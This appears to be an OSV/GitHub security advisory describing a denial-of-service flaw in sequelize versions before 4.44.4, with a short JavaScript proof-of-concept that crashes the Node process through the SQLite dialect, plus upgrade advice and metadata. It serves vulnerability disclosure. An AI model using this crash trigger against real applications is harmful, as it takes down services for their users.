GHSA-fw4p-36j9-rrj3

Suggest an improvement
Source
https://github.com/advisories/GHSA-fw4p-36j9-rrj3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-fw4p-36j9-rrj3
Published
2020-09-03T20:25:33Z
Modified
2020-08-31T18:48:48Z
Summary
Denial of Service in sequelize
Details

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process: 

const Sequelize = require('sequelize');

const sequelize = new Sequelize({
    dialect: 'sqlite',
    storage: 'database.sqlite'
});

const TypeError = sequelize.define('TypeError', {
    name: Sequelize.STRING,
});

TypeError.sync({force: true}).then(() => {
    return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});

Recommendation

Upgrade to version 4.44.4 or later.

Database specific 
{
    "github_reviewed": true,
    "severity": "MODERATE",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-248"
    ],
    "github_reviewed_at": "2020-08-31T18:48:48Z"
}
References

Affected packages

npm / sequelize

Package

Name
sequelize
View open source insights on deps.dev
Purl
pkg:npm/sequelize

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.44.4

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json"